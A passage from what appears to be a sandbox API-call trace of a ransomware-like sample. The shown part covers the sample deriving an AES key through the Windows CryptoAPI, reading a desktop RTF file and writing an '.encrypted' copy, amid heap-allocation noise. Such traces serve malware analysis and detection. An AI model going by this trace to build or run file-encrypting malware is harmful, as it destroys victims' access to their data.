dwCmpFlags=0x1, lpString1="top\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.400] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.401] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.401] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.401] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.401] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.401] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.401] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.401] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c881f0, ftCreationTime.dwHighDateTime=0x1d5c219, ftLastAccessTime.dwLowDateTime=0x909c3920, ftLastAccessTime.dwHighDateTime=0x1d5be0c, ftLastWriteTime.dwLowDateTime=0x909c3920, ftLastWriteTime.dwHighDateTime=0x1d5be0c, nFileSizeHigh=0x0, nFileSizeLow=0xbbad, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="T2TLwD.rtf", cAlternateFileName="")) returned 0x7c2100 [0030.401] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.401] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.401] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.401] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.401] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.401] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.401] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0030.402] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.402] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.402] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.402] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.402] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.403] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.403] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.403] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.403] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.403] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.403] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.403] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.403] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.403] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.403] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0030.403] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.403] CryptDestroyHash (hHash=0x7c2240) returned 1 [0030.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t2tlwd.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.403] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.403] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.404] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.404] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.404] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.405] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.encrypted.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t2tlwd.encrypted.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.406] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0030.407] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.407] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0030.407] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.407] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.408] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xbbad, lpOverlapped=0x0) returned 1 [0030.409] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbbad) returned 0x8affc0 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbbad) returned 0x8bbb78 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0030.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.409] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbbad) returned 0x8affc0 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.410] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.410] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.410] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0030.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbbad) returned 0x8affc0 [0030.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | 